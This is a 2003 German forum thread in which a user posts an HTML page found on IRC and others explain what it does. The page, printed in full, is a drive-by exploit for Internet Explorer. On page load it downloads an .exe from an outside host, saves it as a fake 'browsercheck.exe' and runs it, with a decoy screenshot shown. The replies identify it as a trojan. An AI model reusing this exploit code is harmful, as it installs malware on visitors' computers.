• 11.07.2025, 03:12
  • Registrieren
  • Anmelden
  • Sie sind nicht angemeldet.

 

xx_ElBarto

God

frage zu script

Montag, 17. November 2003, 19:04

das hier ist heute durchs irc gegeistert, kann mir jemand sagen was das script macht?

Quellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
<html>

<head>

</head>
<body onLoad="doit()">




<p>
  <textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream");
s.Mode=3;
s.Type=1;
s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","[url]http://home.arcor.de/zensiert/tcl-scripts.exe",0);[/url]
x.Send();
s.Write(x.responseBody);
s.SaveToFile("C:\\windows\\temp\\browsercheck.exe",2);
</textarea>
  <textarea id="code2" style="display: none;">
md="<object id=\"oFile\""+
    " classid=\"clsid:11111111-1111-1111-1111-111111111111\""+
    " codebase=\"c:/windows/temp/browsercheck.exe\"></object>";

w=createPopup();
w.document.clear();
w.document.write(md);
</textarea>
  <script language="javascript">
    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {

            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/"/g,"\\\"");
            line = line.replace(/[/]/g,"%2f");

            line = line.replace(/\r\n/,"");
            line += ' ';

            if (line != '') {
                result += line;
            }
        }
        return result;
    }
    function weiter() {
        open(myURL,"_search");
    }

    function starten(thecode) {
        mycode = preparecode(thecode);
        myURL = "file:javascript:eval('" + mycode + "')";
        open("http:///","_search");
        setTimeout("weiter()", 500);
    } 

    function doit() {
    starten(document.all.code.value);
    setTimeout("doit2()", 600);
    }   

    function doit2() {
    starten(document.all.code2.value);
    }   
</script>
</p>
<p>²</p>
<p><br>
</p>
<p></p>
<p> <img src="http://www.counter-strike.de/screens/screens/screen-1068736745.jpg" width="640" height="480"><br>
</p>
<p><br>
</p>
</body>

</html>

DAP

God

Re: frage zu script

Montag, 17. November 2003, 20:09

ich habs nur mal kurz überflogen...

1. öffnet ein popup mit der zieladresse " http://www.counter-strike.de/screens/scr…-1068736745.jpg "

2. läd im hintergrund diese datei runter: " http://home.arcor.de/[gelöscht]/tcl-scripts.exe "

3. speichert diese datei unter "c:\windows/temp/browsercheck.exe" ab

4. führt diese datei aus


für mich stinkt das nach nem trojaner/virus ;)

lösch bitte mal nen teil des links zur datei raus, nicht dass das noch jemand runterläd und ausführt :)

xx_ElBarto

God

Re: frage zu script

Montag, 17. November 2003, 20:34

Zitat von »DAP«

für mich stinkt das nach nem trojaner/virus ;)


jo, das is klar, mich hat nur interessiert was er macht, also thx für deine erklärung
achja -> opera rules, da kann ich überall draufklicken ;D

DAP

God

Re: frage zu script

Montag, 17. November 2003, 20:35

Zitat von »ElBarto«



jo, das is klar, mich hat nur interessiert was er macht, also thx für deine erklärung
achja -> opera rules, da kann ich überall draufklicken ;D


jop da die .exe über activex runtergeladen wird funktioniert das ganze nur in diesem browserähnlichen ding namens IE ;)

Eumel

God

Re: frage zu script

Montag, 17. November 2003, 20:37

Sofern man keine hübsche Firewall hat ;D

MfG
"I've always said, the Web is the sum of all human knowledge plus porn.", Ron Gilbert
UltraStar Manager 1.7.2 | Infos zu meinem PC | .o0 DeathSpank 0o.

DAP

God

Re: frage zu script

Montag, 17. November 2003, 20:42

Zitat von »Saiyaman«

Sofern man keine hübsche Firewall hat ;D

MfG


och ne firewall bringt dir da net sehr viel - um genau zu sein garnix da der ie die datei direkt runterläd... :)

Eumel

God

Re: frage zu script

Montag, 17. November 2003, 20:45

Tut er nicht, weil mein IE hier keine Berechtigung dafür bei der Firewall hat. Das Spielchen hatten wir schonmal bei nem c't-Test.

MfG
"I've always said, the Web is the sum of all human knowledge plus porn.", Ron Gilbert
UltraStar Manager 1.7.2 | Infos zu meinem PC | .o0 DeathSpank 0o.